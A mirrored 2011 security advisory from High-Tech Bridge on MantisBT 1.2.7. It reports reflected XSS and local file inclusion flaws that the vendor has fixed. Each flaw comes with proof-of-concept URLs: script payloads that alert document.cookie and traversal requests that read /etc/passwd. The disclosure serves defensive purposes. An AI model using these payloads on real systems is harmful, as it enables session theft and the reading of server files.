Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26976
HistorySep 09, 2011 - 12:00 a.m.

Multiple vulnerabilities in MantisBT

2011-09-0900:00:00
vulners.com
47
JSON

Vulnerability ID: HTB23045
Reference: https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_mantisbt.html
Product: MantisBT
Vendor: www.mantisbt.org ( http://www.mantisbt.org/ )
Vulnerable Version: 1.2.7 and probably prior
Tested Version: 1.2.7
Vendor Notification: 31 August 2011
Vulnerability Type: Local File Inclusion, XSS
Status: Fixed by Vendor
Risk level: High
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in MantisBT, which can be exploited to perform cross-site scripting, local file inclusion attacks.

1) Input passed via the "action" GET parameter to bug_actiongroup_ext_page.php & bug_actiongroup_page.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

The following PoC code is available:

http://[host]/bug_actiongroup_ext_page.php?bug_arr[]=1&action=EXT_%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/bug_actiongroup_page.php?bug_arr[]=[ISSUE_ID]&action=EXT_%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

2) Input passed via the "action" GET parameter to bug_actiongroup_ext_page.php & bug_actiongroup_page.php is not properly verified before being used to include files.
This can be exploited to include arbitrary files from local resources via directory traversal sequences and URL-encoded NULL bytes.

http://[host]/bug_actiongroup_ext_page.php?bug_arr[]=1&action=EXT_/…/…/…/…/…/…/…/etc/passwd%00
http://[host]/bug_actiongroup_page.php?bug_arr[]=[ISSUE_ID]&action=EXT_/…/…/…/…/…/…/…/etc/passwd%00

3) Input appended to the URL after manage_config_email_page.php & manage_config_workflow_page.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

http://[host]/manage_config_email_page.php/%22%3E%3Cimg%20src=1%20onerror=%22javascript:alert%28document.cookie%29;%22%3E/
http://[host]/manage_config_workflow_page.php/%22%3E%3Cimg%20src=1%20onerror=%22javascript:alert%28document.cookie%29;%22%3E/

4) Input passed via the "platform", "os", "os_build", GET parameter to bug_report_page.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

http://[host]/bug_report_page.php?platform=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Solution: Upgrade to the most recent version

JSON